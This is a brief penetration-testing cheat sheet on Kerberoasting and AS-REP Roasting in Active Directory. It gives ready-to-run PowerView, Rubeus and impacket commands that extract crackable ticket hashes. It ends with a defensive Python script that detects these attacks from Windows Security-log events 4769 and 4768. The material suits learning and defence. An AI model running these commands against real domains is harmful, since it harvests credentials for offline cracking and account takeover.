Kerberos Attacks
Kerberoasting
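Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. Any authenticated domain user can request a service ticket for an account that has a Service Principal Name (SPN), and part of that ticket is encrypted with a key derived from the service account's password. The attack requires a valid domain user account and password.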
Vulnerability detection
PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -SPN
Windows
PowerView
Import-Module .\PowerView.ps1
Invoke-Kerberoast
Rubeus
.\Rubeus.exe kerberoast /nowrap
Linux
impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass
AS-REP Roasting
AS-REP Roasting targets accounts that have the "Do not require Kerberos preauthentication" option enabled.
Windows
- ActiveDirectory module (manual)
Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | Where-Object {$_.DoesNotRequirePreAuth -eq $true -and $_.Enabled -eq $true} | Select-Object Name
- PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
- Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local
Linux
impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt
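On the defensive side, both techniques above show up in the domain controller's Security log: service-ticket requests as event 4769 and TGT requests as event 4768. The following is an added example, not part of the original page, that flags RC4 (0x17) service-ticket bursts and TGTs issued without pre-authentication; the dict layout, the sample events and the thresholds are constructed assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23; AES tickets are 0x11 / 0x12

# Constructed sample records (assumed dict layout for exported Security-log events).
EVENTS = [
    {"id": 4769, "time": "2024-05-01T10:00:01", "TargetUserName": "jdoe@DOMAIN.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2024-05-01T10:00:02", "TargetUserName": "jdoe@DOMAIN.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2024-05-01T10:00:03", "TargetUserName": "jdoe@DOMAIN.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2024-05-01T10:02:00", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12"},
    {"id": 4769, "time": "2024-05-01T10:02:05", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "FILE01$", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2024-05-01T10:03:00", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"id": 4768, "time": "2024-05-01T10:04:00", "TargetUserName": "full.name",
     "PreAuthType": "0"},
    {"id": 4768, "time": "2024-05-01T10:05:00", "TargetUserName": "alice",
     "PreAuthType": "2"},
]

def kerberoast_suspects(events, min_services=3, window=timedelta(minutes=5)):
    """Requesters of RC4 tickets for >= min_services distinct user SPN accounts in window."""
    per_user = defaultdict(list)
    for e in events:
        if e["id"] != 4769 or int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and krbtgt are routine traffic
        per_user[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), svc))
    suspects = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for start, _ in reqs:  # slide a window starting at each request
            svcs = {s for t, s in reqs if timedelta(0) <= t - start <= window}
            if len(svcs) >= min_services:
                suspects[user] = sorted(svcs)
                break
    return suspects

def asrep_suspects(events):
    """Accounts that were issued a TGT without pre-authentication (PreAuthType 0)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["id"] == 4768 and e["PreAuthType"] == "0"})
```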